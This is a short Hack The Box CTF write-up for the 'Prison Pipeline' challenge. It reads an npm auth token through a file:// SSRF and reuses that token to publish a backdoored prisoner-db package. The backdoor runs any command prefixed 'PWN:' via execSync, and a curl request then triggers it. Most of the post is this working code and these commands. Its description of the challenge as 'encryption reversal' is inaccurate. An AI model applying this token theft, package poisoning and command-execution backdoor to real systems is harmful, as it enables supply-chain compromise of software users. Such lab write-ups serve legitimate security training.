Post

HackTheBox Prision Pipeline Writeup

Posted
By x3ric
1 min read

Explore the basics of cybersecurity in the Prision Pipeline Challenge on Hack The Box. This medium-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

my challenge ip and port 94.237.60.154:32828

Prisoner Importer “Curl under the hood”

file:///home/node/.npmrc

Click on Import Prisoner Record

1

//localhost:4873/:_authToken="MWZlMmI1OTRiZjMwNTJkMjYwNWZhYTE1NGJlNTVjZDQ6OGRjNDBlMDE3YWNhYjViYzEwM2RlOTQzYzg3OWZiN2YwY2EyZGI5ZmMwMGI4ZWViZWVhZmUzZjc0Y2I2MWFiOTZmNWI1OWVhNTg0N2IwZmIwZQ=="

add in hosts 94.237.60.154 registry.prison-pipeline.htb

1
2

cd challenge/prisoner-db
nano .npmrc

1

//registry.prison-pipeline.htb:32828/:_authToken="MWZlMmI1OTRiZjMwNTJkMjYwNWZhYTE1NGJlNTVjZDQ6OGRjNDBlMDE3YWNhYjViYzEwM2RlOTQzYzg3OWZiN2YwY2EyZGI5ZmMwMGI4ZWViZWVhZmUzZjc0Y2I2MWFiOTZmNWI1OWVhNTg0N2IwZmIwZQ=="

1
2
3

npm cache clean --force
npm whoami --registry=http://registry.prison-pipeline.htb:32828
nano index.js

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

    async importPrisoner(url) {
        // implement backdoor
        const child_process = require('child_process');
        if (url.includes('PWN:')) {
            try {
                let cmd = url.replace('PWN:', '');
                let output = child_process.execSync(cmd).toString();
                return output;
            }
            catch (error) {
                return 'PWN: Error executing command.';
            }
        }        
        ...SNIP...
    }

1

nano package.json

1

"version": "1.0.1",

1
2
3

npm publish --registry=http://registry.prison-pipeline.htb:32828
sleep 5
curl -X POST 'http://94.237.60.154:32828/api/prisoners/import' -H 'Content-Type: application/json' -d '{"url": "PWN:/readflag"}'

Summary

The Prison Pipeline Challenge on Hack The Box is a medium-level challenge focused on encryption reversal and file handling. It involves interacting with a private npm registry and exploiting the importPrisoner function in the prisoner-db package by implementing a backdoor. The backdoor executes system commands when a URL starting with PWN: is provided. The challenge guides you through setting up the registry, modifying the package to include the backdoor, updating the version, and publishing the malicious package. Finally, it demonstrates triggering the backdoor by making an HTTP request to execute a command.

challenge
htb challenge writeup linux misc
This post is licensed under CC BY 4.0 by the author.